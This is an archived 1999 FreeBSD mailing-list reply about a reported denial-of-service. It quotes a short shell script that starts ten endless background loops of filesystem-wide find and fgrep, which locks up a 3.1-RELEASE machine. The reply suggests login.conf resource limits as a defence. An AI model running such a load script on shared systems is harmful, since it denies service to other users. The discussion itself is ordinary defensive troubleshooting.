From owner-freebsd-current Thu Mar 4 13:53:36 1999 Delivered-To: freebsd-current@freebsd.org Received: from holly.dyndns.org (ip152.houston13.tx.pub-ip.psi.net [38.27.213.152]) by hub.freebsd.org (Postfix) with ESMTP id 7C05114F2A for ; Thu, 4 Mar 1999 13:53:21 -0800 (PST) (envelope-from chris@holly.dyndns.org) Received: (from chris@localhost) by holly.dyndns.org (8.9.3/8.9.3) id PAA05778; Thu, 4 Mar 1999 15:54:02 -0600 (CST) (envelope-from chris) Date: Thu, 4 Mar 1999 15:54:01 -0600 From: Chris Costello To: Mike Tancsa Cc: current@FreeBSD.ORG Subject: Re: Simple DOS against 3.x locks box solid Message-ID: <19990304155401.A5710@holly.dyndns.org> Reply-To: chris@calldei.com References: <4.1.19990304073656.084804e0@granite.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3us In-Reply-To: <4.1.19990304073656.084804e0@granite.sentex.ca>; from Mike Tancsa on Thu, Mar 04, 1999 at 07:38:43AM -0500 Sender: owner-freebsd-current@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Thu, Mar 4, 1999, Mike Tancsa put this into my mailbox: > > Is there any way to stop what is below ? Yep. Don't do it! Seriously, though, that puts a major load on the system. You have 10 process all telling the drivers to keep seeking about through the disks. Add /etc/login.conf restrictions if you don't want your users to do that. > > > > As posted by yk@dgtu.donetsk.ua > > > >This script freeze my 3.1-RELEASE box. > >I can't make any connection with my box, also from console. > > > >-------- cut here --- > >#! /bin/sh > > > >for j in 1 2 3 4 5 6 7 8 9 10 > >do > >echo -n $j > >nohup sh -c 'while :; do find / -type file |xargs fgrep fticom; done' > >/dev/null 2>&1 & > >echo > >done > >--------- cut here ---- > > > >-- > >Yury V. Yaroshevsky | Donetsk State Technical University > >YY18-RIPE | (380 622) 356455 yk@dgtu.donetsk.ua > > > ********************************************************************** > Mike Tancsa, Network Admin * mike@sentex.net > Sentex Communications Corp, * http://www.sentex.net/mike > Cambridge, Ontario * 01.519.651.3400 > Canada * > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-current" in the body of the message > -- Powered by FreeBSD 4.0-CURRENT. "The Power to Serve!" int main(int m){main(!main(0));} To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-current" in the body of the message